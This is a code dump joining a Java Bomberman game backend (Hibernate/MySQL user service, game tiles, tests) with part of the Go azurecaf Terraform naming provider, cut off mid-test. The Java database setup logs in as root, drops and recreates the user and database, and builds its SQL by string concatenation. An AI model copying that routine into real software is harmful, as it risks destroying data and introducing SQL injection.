@Override
@Nullable
public Collection<UserProfile> getTop10Users() {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
final LinkedList<UserProfile> result = new LinkedList<>();
dao.readTop10().stream().forEach((data) -> result.add(new UserProfile(data)));
return result;
} catch (HibernateException ex) {
final String reason = "Could not get Top10 users somewhy! O_o";
LOGGER.error(reason, ex);
return null;
}
}
@Override
@Nullable
public UserProfile addUser(String login, String password, boolean isGuest) {
if (containsLogin(login))
return null;
final UserProfileData newUser = new UserProfileData(login, password, isGuest);
save(newUser);
return getByLogin(login);
}
@Nullable
@Override
public UserProfile addUser(String login, String password) {
return addUser(login, password, false);
}
@Override
public boolean containsID(Long id) {
return getById(id) != null;
}
@Override
public boolean containsLogin(String name) {
return getByLogin(name) != null;
}
@Override
public void deleteUser(Long id) {
try (Session session = sessionFactory.openSession()) {
final UserProfileDataDAO dao = new UserProfileDataDAO(session);
dao.delete(id);
} catch (HibernateException ex) {
final String reason = "Could not delete user #" + id + '!';
LOGGER.error(reason, ex);
}
}
@Override
public void close() {
sessionFactory.close();
}
private static SessionFactory createSessionFactory(Configuration configuration) {
final StandardServiceRegistryBuilder builder = new StandardServiceRegistryBuilder();
builder.applySettings(configuration.getProperties());
final ServiceRegistry serviceRegistry = builder.build();
return configuration.buildSessionFactory(serviceRegistry);
}
private void setup() throws HibernateException {
LOGGER.info("-----Initializing Hibernate-----");
final Configuration configuration = new Configuration();
configuration.addAnnotatedClass(UserProfileData.class);
configuration.setProperty("hibernate.dialect", "org.hibernate.dialect.MySQLDialect");
configuration.setProperty("hibernate.connection.driver_class", "com.mysql.jdbc.Driver");
configuration.setProperty("hibernate.connection.url", config.getAddress() + config.getDbName());
configuration.setProperty("hibernate.connection.username", config.getLogin());
configuration.setProperty("hibernate.connection.password", config.getPassword());
configuration.setProperty("hibernate.show_sql", "true");
configuration.setProperty("hibernate.hbm2ddl.auto", config.getCreationMethod());
sessionFactory = createSessionFactory(configuration);
LOGGER.info("-----Hibernate Initialized-----");
}
@SuppressWarnings({"JDBCResourceOpenedButNotSafelyClosed"})
private void connectToDBOrDie() throws Exception {
Connection rootConnection = null;
//noinspection OverlyBroadCatchBlock
try {
final Driver driver = (Driver) Class.forName("com.mysql.jdbc.Driver").newInstance();
DriverManager.registerDriver(driver);
DriverManager.setLoginTimeout(1);
rootConnection = DriverManager.getConnection(config.getAddress(), "root", config.getRootPassword());
final Statement statement = rootConnection.createStatement();
statement.execute("DROP USER IF EXISTS " + config.getLoginDomain());
statement.execute("CREATE USER " + config.getLoginDomain() + " IDENTIFIED BY \"" + config.getPassword() + "\";");
statement.execute("DROP DATABASE IF EXISTS " + config.getDbName() + ';');
statement.execute("CREATE DATABASE IF NOT EXISTS " + config.getDbName() + ';');
statement.execute("GRANT ALL ON " + config.getDbName() + ".* TO " + config.getLoginDomain() + ';');
LOGGER.info("Database succesfully created!");
} catch (Exception ex) {
LOGGER.fatal("Could not create database!", ex);
throw ex;
} finally {
if (rootConnection != null) try {rootConnection.close();} catch (SQLException ignore) {/*ignore.printStackTrace();*/}
}
}
private SessionFactory sessionFactory;
private final Config config;
private static final Logger LOGGER = LogManager.getLogger(DataBaseServiceMySQLImpl.class);
public enum DBTYPE {
PRODUCTION, DEBUG
}
private static final class Config {
private Config(Map<String, String> externalParameters, DBTYPE dbtype) {
parameters = externalParameters;
switch (dbtype) {
case PRODUCTION:
makeProduction();
break;
case DEBUG:
makeDebug();
break;
}
}
private void makeProduction() {
dbName = parameters.get("db_name");
login = parameters.get("db_user");
password = parameters.get("db_password");
loginDomain = parameters.get("db_user") + '@' + parameters.get("db_domain");
creationMethod = parameters.get("db_creation_method");
address = "jdbc:mysql://" + parameters.get("db_domain") + ':' + parameters.get("db_port") + '/';
rootPassword = parameters.get("db_root_password");
}
private void makeDebug() {
dbName = parameters.get("db_name_debug");
login = parameters.get("db_user_debug");
password = <PASSWORD>("db_password_debug");
loginDomain = parameters.get("db_user_debug") + '@' + parameters.get("db_domain");
creationMethod = parameters.get("db_creation_method_debug");
address = "jdbc:mysql://" + parameters.get("db_domain") + ':' + parameters.get("db_port") + '/';
rootPassword = parameters.get("db_root_password");
}
public String getLoginDomain() {
return loginDomain;
}
public String getDbName() {
return dbName;
}
public String getRootPassword() {
return rootPassword;
}
public String getLogin() {
return login;
}
public String getPassword() {
return password;
}
public String getCreationMethod() {
return creationMethod;
}
public String getAddress() {
return address;
}
private String dbName;
private String login;
private String password;
private String rootPassword;
private String address;
private String loginDomain;
private String creationMethod;
private final Map<String, String> parameters;
}
}
<file_sep>/src/main/java/bomberman/mechanics/tiles/functors/ActionTileAbstractFunctor.java
package bomberman.mechanics.tiles.functors;
import bomberman.mechanics.World;
import bomberman.mechanics.interfaces.Actable;
import bomberman.mechanics.tiles.ActionTile;
public abstract class ActionTileAbstractFunctor implements Actable{
public ActionTileAbstractFunctor(World eventList){
this.eventList = eventList;
}
public void linkWithTile(ActionTile newOwner)
{
owner = newOwner;
}
protected ActionTile owner;
protected final World eventList;
}
<file_sep>/src/test/java/main/databaseService/DataBaseServiceMySQLImplTest.java
package main.databaseservice;
import constants.Constants;
import main.config.ServerInitializer;
import org.junit.Before;
import org.junit.Test;
import rest.UserProfile;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import static org.junit.Assert.*;
public class DataBaseServiceMySQLImplTest {
@Before
public void init() throws Exception {
final ServerInitializer serverInitializer = new ServerInitializer(null);
final Map<String, String> properties = serverInitializer.getPropertiesMap();
dataBase = new DataBaseServiceMySQLImpl(properties, DataBaseServiceMySQLImpl.DBTYPE.DEBUG);
}
@Test
public void testAddUser() throws Exception {
UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals( dataBase.getById(user.getId()), dataBase.getByLogin(user.getLogin()));
user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNull(user);
}
@Test
public void testDeleteUser() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
final String login = user.getLogin();
final long id = user.getId();
dataBase.deleteUser(id);
assertNull( dataBase.getById(id));
assertNull( dataBase.getByLogin(login));
}
@Test
public void testGetUsers() throws Exception {
final UserProfile user1 = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
final UserProfile user2 = dataBase.addUser("user1", "user1");
assertNotNull(user1);
assertNotNull(user2);
final Map<Long, UserProfile> map = new HashMap<>();
map.put(user1.getId(), user1);
map.put(user2.getId(), user2);
final Collection<UserProfile> userData = dataBase.getUsers();
assertNotNull(userData);
assertEquals(map.values().toString(), userData.toString());
}
@Test
public void testContainsID() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
long id = user.getId();
assertEquals(true, dataBase.containsID(id));
id = -1L;
assertEquals(false, dataBase.containsID(id));
}
@Test
public void testSave() throws Exception {
UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
final int desiredScore = 100;
user.setScore(desiredScore);
user = dataBase.getByLogin(Constants.USER_LOGIN);
assertNotNull(user);
assertNotEquals(desiredScore, user.getScore());
user.setScore(desiredScore);
dataBase.save(user.getData());
user = dataBase.getByLogin(Constants.USER_LOGIN);
assertNotNull(user);
assertEquals(desiredScore, user.getScore());
}
@Test
public void testGetById() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
final long id = user.getId();
assertEquals(user, dataBase.getById(id));
}
@Test
public void testGetByLogin() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals(user, dataBase.getByLogin(Constants.USER_LOGIN));
}
@Test
public void testContainsLogin() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals(true, dataBase.containsLogin(Constants.USER_LOGIN));
assertEquals(false, dataBase.containsLogin(""));
}
private DataBaseServiceMySQLImpl dataBase;
}<file_sep>/src/main/java/bomberman/mechanics/tiles/OwnedActionTile.java
package bomberman.mechanics.tiles;
import bomberman.mechanics.Bomberman;
import bomberman.mechanics.interfaces.EntityType;
import bomberman.mechanics.interfaces.Ownable;
import bomberman.mechanics.tiles.behaviors.ActionTileAbstractBehavior;
import bomberman.mechanics.tiles.functors.ActionTileAbstractFunctor;
public class OwnedActionTile extends ActionTile implements Ownable {
public OwnedActionTile(int id, ActionTileAbstractFunctor functor, ActionTileAbstractBehavior behavior, EntityType entityType, Bomberman owner) {
super(id, functor, behavior, entityType);
this.owner = owner;
}
@Override
public Bomberman getOwner() {
return owner;
}
@Override
public boolean isPassable() {
return this.getType() != EntityType.BOMB;
}
private final Bomberman owner;
}
// This class is giant, huge KOCTblJIb!!!
//
// __ __
// \ \ / /
// \ \__________/ /
// \ ________ /
// \ \ / /
// | | | |
// | | | |
// | | | |
// | | | |
// | | | |
// | | | |
// | | | |
// \ \____/ /
// \ __ /
// || ||
// |\__/|
// \ /
// ||
// ||
// ||
// ||
// ||
// ||
// ||
// ||
// ||
// \__/<file_sep>/src/main/java/bomberman/mechanics/interfaces/Describable.java
package bomberman.mechanics.interfaces;
public interface
Describable{
EntityType getType();
int getID();
}
<file_sep>/src/main/java/main/Main.java
package main;
import bomberman.service.RoomManager;
import main.config.Context;
import main.config.ServerInitializer;
import main.websockets.WebSocketConnectionServlet;
import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.servlet.ServletContextHandler;
import org.eclipse.jetty.servlet.ServletHolder;
import org.glassfish.hk2.utilities.binding.AbstractBinder;
import org.glassfish.jersey.server.ResourceConfig;
import org.glassfish.jersey.servlet.ServletContainer;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import rest.Sessions;
import rest.Users;
import java.util.Map;
@SuppressWarnings("OverlyBroadThrowsClause")
public class Main {
public static void main(String[] args) throws Exception {
Context context = null;
Map<String, String> properties = null;
//noinspection OverlyBroadCatchBlock
try {
String propertyFileName = null;
if (args.length >= 1)
propertyFileName = args[0];
final ServerInitializer serverInitializer = new ServerInitializer(propertyFileName);
properties = serverInitializer.getPropertiesMap();
context = serverInitializer.fillNewContext();
UserTokenManager.changeHost(properties.get("host"));
UserTokenManager.changeMaxAge(Integer.parseInt(properties.get("cookie_max_age")));
} catch (Exception ex) {
LOGGER.fatal("Could not setup server. Aborting...", ex);
System.exit(1);
}
final int port = Integer.parseInt(properties.get("port"));
LOGGER.info("Starting at " + port + " port");
final Server server = new Server(port);
final ResourceConfig config = createNewInjectableConfig(context);
final ServletHolder restServletHolder = new ServletHolder(new ServletContainer(config));
final ServletHolder websocketServletHolder = new ServletHolder(new WebSocketConnectionServlet(context, Integer.parseInt(properties.get("ws_timeout"))));
final ServletContextHandler contextHandler = new ServletContextHandler(server, "/*");
contextHandler.addServlet(websocketServletHolder, "/game");
contextHandler.addServlet(restServletHolder, "/api/*");
server.setHandler(contextHandler);
new Thread((RoomManager) context.get(RoomManager.class)).start();
server.start();
server.join();
}
private static ResourceConfig createNewInjectableConfig(Context context) {
final ResourceConfig rc = new ResourceConfig(Users.class, Sessions.class);
rc.register(new AbstractBinder() {
@Override
protected void configure() {
bind(context);
}
});
return rc;
}
private static final Logger LOGGER = LogManager.getLogger(Main.class);
}
<file_sep>/src/main/java/bomberman/mechanics/interfaces/EventType.java
package bomberman.mechanics.interfaces;
public enum EventType {
ENTITY_UPDATED, TILE_SPAWNED, TILE_REMOVED
}
<file_sep>/README.md
# 2016-02-2d
2016-02-2d is Java backend of Bomberman game -- our Technopark project.
Refer to [wiki](https://github.com/VitalyNikolaev/2016-02-2d/wiki) to see the API details and launch specifics.
<file_sep>/src/main/java/bomberman/mechanics/tiles/DestructibleWall.java
package bomberman.mechanics.tiles;
import bomberman.mechanics.interfaces.EntityType;
public class DestructibleWall extends AbstractTile {
public DestructibleWall(int id) {
super(id);
}
@Override
public boolean isDestructible() {
return true;
}
@Override
public boolean isPassable() {
return false;
}
@Override
public boolean shouldSpawnBonusOnDestruction() {
return true;
}
@Override
public EntityType getType() {
return EntityType.DESTRUCTIBLE_WALL;
}
@SuppressWarnings("QuestionableName")
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
final DestructibleWall that = (DestructibleWall) o;
return getType() == that.getType();
}
@Override
public int hashCode() {
return getType().hashCode();
}
}
<file_sep>/src/test/java/bomberman/service/RoomTest.java
package bomberman.service;
import constants.Constants;
import main.websockets.MessageSendable;
import org.javatuples.Pair;
import org.junit.BeforeClass;
import org.junit.Test;
import rest.UserProfile;
import java.util.ArrayList;
import static org.junit.Assert.*;
import static org.mockito.Mockito.mock;
public class RoomTest {
@BeforeClass
public static void init() {
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u1", "p1", "sid1", 1), mock(MessageSendable.class)));
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u2", "p2", "sid2", 2), mock(MessageSendable.class)));
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u3", "p3", "sid3", 3), mock(MessageSendable.class)));
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u4", "p4", "sid4", 4), mock(MessageSendable.class)));
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u5", "p5", "sid5", 5), mock(MessageSendable.class)));
}
@Test
public void testGetCurrentCapacity() throws Exception {
final Room room = new Room();
assertEquals(0, room.getCurrentCapacity());
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(1, room.getCurrentCapacity());
room.insertPlayer(MOCK_USERS.get(1).getValue0(), MOCK_USERS.get(1).getValue1());
assertEquals(2, room.getCurrentCapacity());
room.removePlayer(MOCK_USERS.get(0).getValue0());
assertEquals(1, room.getCurrentCapacity());
}
@Test
public void testIsFilled() throws Exception {
final Room room = new Room();
assertEquals(false, room.isFilled());
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
room.insertPlayer(MOCK_USERS.get(1).getValue0(), MOCK_USERS.get(1).getValue1());
room.insertPlayer(MOCK_USERS.get(2).getValue0(), MOCK_USERS.get(2).getValue1());
room.insertPlayer(MOCK_USERS.get(3).getValue0(), MOCK_USERS.get(3).getValue1());
assertEquals(true, room.isFilled());
assertEquals(false, room.insertPlayer(MOCK_USERS.get(4).getValue0(), MOCK_USERS.get(4).getValue1()));
}
@Test
public void testIsEmpty() throws Exception {
final Room room = new Room();
assertEquals(true, room.isEmpty());
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(false, room.isEmpty());
}
@Test
public void testInsertPlayer() throws Exception {
final Room room = new Room();
assertEquals(false, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(true, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
}
@Test
public void testHasPlayer() throws Exception {
final Room room = new Room();
assertEquals(false, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(true, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
}
@Test
public void testRemovePlayer() throws Exception {
final Room room = new Room();
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(true, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
room.removePlayer(MOCK_USERS.get(0).getValue0());
assertEquals(false, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
}
private static final ArrayList<Pair<UserProfile, MessageSendable>> MOCK_USERS = new ArrayList<>();
}<file_sep>/src/main/java/bomberman/mechanics/interfaces/EntityType.java
package bomberman.mechanics.interfaces;
public enum EntityType {
BOMBERMAN, DESTRUCTIBLE_WALL, UNDESTRUCTIBLE_WALL, BONUS_INCMAXHP, BONUS_INCMAXRANGE, BONUS_DECBOMBSPAWN, BONUS_INCSPEED, BONUS_MOREBOMBS, BONUS_DROPBOMBONDEATH, BONUS_INVUL, BOMB, BOMB_RAY
}
<file_sep>/cfg/default.properties
ip = 0.0.0.0
host = localhost
port = 80
db_type = production
db_domain = localhost
db_port = 3306
db_name = bomberman_db
db_user = bomberman_db_user
db_password = <PASSWORD>
db_creation_method = update
db_name_debug = bomberman_db_debug
db_user_debug = bomberman_db_user_debug
db_password_debug = bomberman_db_password_debug
db_creation_method_debug = create-drop
db_root_password = <PASSWORD>
ws_timeout = 60000
cookie_max_age = 2400000
static_path = static/
userpic_width = 80
userpic_height = 80
game_threads_number = 4
<file_sep>/src/test/java/bomberman/mechanics/TileFactoryTest.java
package bomberman.mechanics;
import bomberman.mechanics.interfaces.EntityType;
import bomberman.mechanics.interfaces.ITile;
import bomberman.mechanics.interfaces.Ownable;
import constants.Constants;
import org.junit.Test;
import static org.junit.Assert.*;
@SuppressWarnings("OverlyBroadThrowsClause")
public class TileFactoryTest {
@Test
public void testGetNewDestructibleWall() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.DESTRUCTIBLE_WALL, 0);
assertNotNull(tile);
assertEquals(EntityType.DESTRUCTIBLE_WALL, tile.getType());
}
@Test
public void testGetNewUndestructibleWall() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.UNDESTRUCTIBLE_WALL, 0);
assertNotNull(tile);
assertEquals(EntityType.UNDESTRUCTIBLE_WALL, tile.getType());
}
@Test
public void testGetNewRangeBonus() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.BONUS_INCMAXRANGE, Constants.GameMechanicsMocks.getMockedWorld(), 0);
assertNotNull(tile);
assertEquals(EntityType.BONUS_INCMAXRANGE, tile.getType());
}
@Test
public void testGetNewSpawnTimeBonus() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.BONUS_DECBOMBSPAWN, Constants.GameMechanicsMocks.getMockedWorld(), 0);
assertNotNull(tile);
assertEquals(EntityType.BONUS_DECBOMBSPAWN, tile.getType());
}
@Test
public void testGetNewBomb() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.BOMB, Constants.GameMechanicsMocks.getMockedWorld(), Constants.GameMechanicsMocks.getBomberman(), 0);
assertNotNull(tile);
assertEquals(EntityType.BOMB, tile.getType());
assertEquals(Constants.GameMechanicsMocks.getBomberman(), ((Ownable) tile).getOwner());
}
@Test
public void testGetNewBombRay() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.BOMB_RAY, Constants.GameMechanicsMocks.getMockedWorld(), Constants.GameMechanicsMocks.getBomberman(), 0);
assertNotNull(tile);
assertEquals(EntityType.BOMB_RAY, tile.getType());
assertEquals(Constants.GameMechanicsMocks.getBomberman(), ((Ownable) tile).getOwner());
}
} | 0acea36aadac214033f6ed9fecc2722336c4e7df | [
"Markdown",
"Java",
"INI"
] | 34 | Java | VitalyNikolaev/2016-02-2d | 37ec9a89688fb288bb885257d19a94a5ee29f3e8 | cbff8a2ad9bb5b468e187f1241889f371e295a07 |
refs/heads/master | <file_sep># V民之家
CDN
<file_sep>$(function(){var sp=document.getElementById('newslist').getElementsByTagName('ul');var last=document.getElementById('last');var next=document.getElementById('next');var n=0;for(var i=1;i<sp.length;i++){sp[i].style.display='none';}
last.onclick=function(){n--;if(n<0){n=0;}
for(var i=0;i<sp.length;i++){sp[i].style.display='none';}
sp[n].style.display='block';}
next.onclick=function(){n++;if(n>sp.length-1){n=sp.length-1;}
for(var i=0;i<sp.length;i++){sp[i].style.display='none';}
sp[n].style.display='block';}});<file_sep>jQuery(document).ready(function($) {
$(".article_body img").each(function(i) {
_self = $(this);
if (!this.parentNode.href) {
imgsrc = "";
if (_self.attr("data-original")) {
imgsrc = _self.attr("data-original");
} else {
imgsrc = _self.attr("src");
}
$(this).wrap("<a href='" + imgsrc + "' onclick='return hs.expand(this);' style='box-shadow:none;'></a>");
}
});
hs.graphicsDir = "/skin/highslide/";
hs.outlineType = "rounded-white";
hs.dimmingOpacity = 0.8;
hs.outlineWhileAnimating = true;
hs.showCredits = false;
hs.captionEval = "this.thumb.alt";
hs.numberPosition = "caption";
hs.align = "center";
hs.transitions = ["expand", "crossfade"];
hs.addSlideshow({
interval: 5000,
repeat: true,
useControls: true,
fixedControls: "fit",
overlayOptions: {
opacity: 0.75,
position: "bottom center",
hideOnMouseOut: true
}
});
}); | bc43b9b962f39bc3557e244cea555767621e98eb | [
"Markdown",
"JavaScript"
] | 3 | Markdown | mywl-cdn/vmcdn | 22789d118358fd498cb9e93d26723e04d08fc09a | 99e44ed5f3bee53fb5517558c0420ce02bfde1a2 |
refs/heads/main | <repo_name>aztfmod/terraform-provider-azurecaf<file_sep>/azurecaf/resource_naming_convention.go
package azurecaf
import (
"fmt"
"log"
"math/rand"
"regexp"
"strings"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/validation"
)
// resourceNamingConvention describes the legacy azurecaf_naming_convention
// resource. The resource is computed purely client side: Create runs the name
// generation, Read is a no-op and Delete simply drops the entry from state.
func resourceNamingConvention() *schema.Resource {
	// resource_type accepts every key of both the current and the legacy
	// resource definition maps.
	supportedResourceTypes := make([]string, 0, len(Resources)+len(ResourcesMapping))
	for resourceType := range Resources {
		supportedResourceTypes = append(supportedResourceTypes, resourceType)
	}
	for resourceType := range ResourcesMapping {
		supportedResourceTypes = append(supportedResourceTypes, resourceType)
	}
	return &schema.Resource{
		Create:        resourceNamingConventionCreate,
		Read:          schema.Noop,
		Delete:        schema.RemoveFromState,
		SchemaVersion: 2,
		Schema: map[string]*schema.Schema{
			// Base name of the resource to generate a name for.
			"name": {
				Type:     schema.TypeString,
				Optional: true,
				ForceNew: true,
			},
			// Naming methodology; defaults to CAF with random padding.
			"convention": {
				Type:     schema.TypeString,
				Optional: true,
				Default:  ConventionCafRandom,
				ForceNew: true,
				ValidateFunc: validation.StringInSlice([]string{
					ConventionCafClassic,
					ConventionCafRandom,
					ConventionRandom,
					ConventionPassThrough,
				}, false),
			},
			// Single prefix prepended before the CAF slug.
			"prefix": {
				Type:     schema.TypeString,
				Optional: true,
				ForceNew: true,
			},
			"prefixes": {
				Type: schema.TypeList,
				Elem: &schema.Schema{
					Type: schema.TypeString,
				},
				Optional: true,
				ForceNew: true,
			},
			"suffixes": {
				Type: schema.TypeList,
				Elem: &schema.Schema{
					Type: schema.TypeString,
				},
				Optional: true,
				ForceNew: true,
			},
			// Single postfix appended after the base name.
			"postfix": {
				Type:         schema.TypeString,
				Optional:     true,
				ForceNew:     true,
				ValidateFunc: validation.StringIsNotEmpty,
			},
			// Optional cap on the generated length; the resource type's own
			// maximum still applies.
			"max_length": {
				Type:         schema.TypeInt,
				Optional:     true,
				ForceNew:     true,
				ValidateFunc: validation.IntAtLeast(1),
			},
			// Generated name, exposed back to the configuration.
			"result": {
				Type:     schema.TypeString,
				Computed: true,
			},
			"resource_type": {
				Type:         schema.TypeString,
				Optional:     true,
				ValidateFunc: validation.StringInSlice(supportedResourceTypes, false),
				ForceNew:     true,
			},
		},
	}
}
// resourceNamingConventionCreate handles the Terraform "create" operation by
// delegating to the read path, which computes and stores the generated name.
func resourceNamingConventionCreate(d *schema.ResourceData, meta interface{}) error {
	return resourceNamingConventionRead(d, meta)
}
// resourceNamingConventionRead recomputes the generated name from the
// configured inputs and stores it in the "result" attribute.
func resourceNamingConventionRead(d *schema.ResourceData, meta interface{}) error {
	return getResult(d, meta)
}
// resourceNamingConventionDelete is a no-op: the resource only exists in
// Terraform state. NOTE(review): the schema wires Delete to
// schema.RemoveFromState, so this function appears unused — confirm before
// removing.
func resourceNamingConventionDelete(d *schema.ResourceData, meta interface{}) error {
	return nil
}
// getResult computes the generated name for the azurecaf_naming_convention
// resource and stores it in the "result" attribute.
//
// The name is assembled from [prefix]-[caf prefix]-[name]-[postfix] (joined
// with the suffix separator), optionally padded with random characters
// depending on the selected convention, cleaned of characters the target
// resource type does not allow, trimmed to the maximum allowed length,
// lower-cased when the resource requires it, and finally validated against
// the resource type's validation pattern.
//
// It returns an error when the resource type is unknown, when one of the
// resource's regular expressions does not compile, or when the generated
// name does not satisfy the validation pattern.
func getResult(d *schema.ResourceData, meta interface{}) error {
	name := d.Get("name").(string)
	prefix := d.Get("prefix").(string)
	postfix := d.Get("postfix").(string)
	resourceType := d.Get("resource_type").(string)
	convention := d.Get("convention").(string)
	desiredMaxLength := d.Get("max_length").(int)
	// Resolve the resource definition: current map first, then legacy aliases.
	var resource ResourceStructure
	var resourceFound bool
	if resource, resourceFound = Resources[resourceType]; !resourceFound {
		resource, resourceFound = ResourcesMapping[resourceType]
	}
	if !resourceFound {
		return fmt.Errorf("Invalid resource type %s", resourceType)
	}
	regExFilter := string(resource.RegEx)
	validationRegExPattern := string(resource.ValidationRegExp)
	// BUG FIX: the pattern may contain '%' characters; never pass it as a
	// printf format string (was log.Printf(regExFilter), flagged by go vet).
	log.Printf("%s", regExFilter)
	var cafPrefix string
	randomSuffix := randSeq(int(resource.MaxLength), nil)
	// Configure the name components according to the naming convention.
	switch convention {
	case ConventionCafRandom, ConventionCafClassic:
		cafPrefix = resource.CafPrefix
	case ConventionRandom:
		// Pure random: ignore the user supplied name and postfix.
		name = ""
		postfix = ""
	}
	// Compile the cleaning and validation expressions. The patterns come from
	// the internal resource tables, but a broken entry must surface as an
	// error instead of a nil-regex panic (errors were previously discarded).
	myRegex, err := regexp.Compile(regExFilter)
	if err != nil {
		return fmt.Errorf("Invalid filter pattern %s for resource type %s: %s", regExFilter, resourceType, err)
	}
	validationRegEx, err := regexp.Compile(validationRegExPattern)
	if err != nil {
		return fmt.Errorf("Invalid validation pattern %s for resource type %s: %s", validationRegExPattern, resourceType, err)
	}
	// Join the non-empty components, then strip characters the resource type
	// does not allow (from both the user input and the random padding).
	nameList := []string{}
	for _, s := range []string{prefix, cafPrefix, name, postfix} {
		if strings.TrimSpace(s) != "" {
			nameList = append(nameList, s)
		}
	}
	userInputName := strings.Join(nameList, suffixSeparator)
	userInputName = myRegex.ReplaceAllString(userInputName, "")
	randomSuffix = myRegex.ReplaceAllString(randomSuffix, "")
	// Default (caf classic) case: the generated name is just the user input.
	generatedName := userInputName
	// Effective maximum length: the resource type's limit, optionally reduced
	// by the user supplied max_length.
	maxLength := int(resource.MaxLength)
	if desiredMaxLength > 0 && desiredMaxLength < maxLength {
		maxLength = desiredMaxLength
	}
	// Track whether random characters made it into the generated string, so
	// the trailing character can be fixed up below.
	containsRandomChar := false
	switch convention {
	case ConventionPassThrough:
		// the naming is already configured
	case ConventionCafClassic:
		// the naming is already configured
	default:
		if len(userInputName) != 0 {
			if len(userInputName) < (maxLength - 1) { // prevent adding a suffix separator as the last character
				containsRandomChar = true
				generatedName = strings.Join([]string{userInputName, randomSuffix}, suffixSeparator)
			} else {
				generatedName = userInputName
			}
		} else {
			containsRandomChar = true
			generatedName = randomSuffix
		}
	}
	// Remove unsupported characters and trim to the maximum length.
	filteredGeneratedName := myRegex.ReplaceAllString(generatedName, "")
	length := len(filteredGeneratedName)
	if length > maxLength {
		length = maxLength
	}
	result := string(filteredGeneratedName[0:length])
	// When random padding was appended, force the last character to be a
	// letter so the name stays valid for resources that forbid a trailing
	// digit or separator.
	if containsRandomChar && len(result) > len(userInputName) {
		randomLastChar := alphagenerator[rand.Intn(len(alphagenerator)-1)]
		resultRune := []rune(result)
		resultRune[len(resultRune)-1] = randomLastChar
		result = string(resultRune)
	}
	if resource.LowerCase {
		result = strings.ToLower(result)
	}
	if !validationRegEx.MatchString(result) {
		return fmt.Errorf("Invalid name for Random CAF naming %s %s Id:%s , the pattern %s doesn't match %s", resource.ResourceTypeName, name, d.Id(), validationRegExPattern, result)
	}
	// Propagate the computed attribute (the error was previously ignored).
	if err := d.Set("result", result); err != nil {
		return err
	}
	// The resource id is a fresh random 16-character sequence.
	d.SetId(randSeq(16, nil))
	return nil
}
<file_sep>/azurecaf/resource_naming_convention_cafclassic_test.go
package azurecaf
import (
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
// TestAccCafNamingConvention_Classic exercises the legacy
// azurecaf_naming_convention resource with the "cafclassic" convention: for
// each resource type declared in testAccResourceCafClassicConfig it checks
// that the generated name carries the expected CAF prefix, has the expected
// length, and matches the resource type's validation regular expression.
func TestAccCafNamingConvention_Classic(t *testing.T) {
	resource.UnitTest(t, resource.TestCase{
		PreCheck:     func() { testAccPreCheck(t) },
		Providers:    testAccProviders,
		CheckDestroy: testAccCheckResourceDestroy,
		Steps: []resource.TestStep{
			{
				Config: testAccResourceCafClassicConfig,
				// One validation pair (name/length check + regex match) per
				// resource type in the configuration.
				Check: resource.ComposeTestCheckFunc(
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_st",
						"log",
						5,
						"st"),
					regexMatch("azurecaf_naming_convention.classic_st", regexp.MustCompile(Resources["st"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_aaa",
						"automation",
						14,
						"aaa"),
					regexMatch("azurecaf_naming_convention.classic_aaa", regexp.MustCompile(Resources["aaa"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_acr",
						"registry",
						11,
						"acr"),
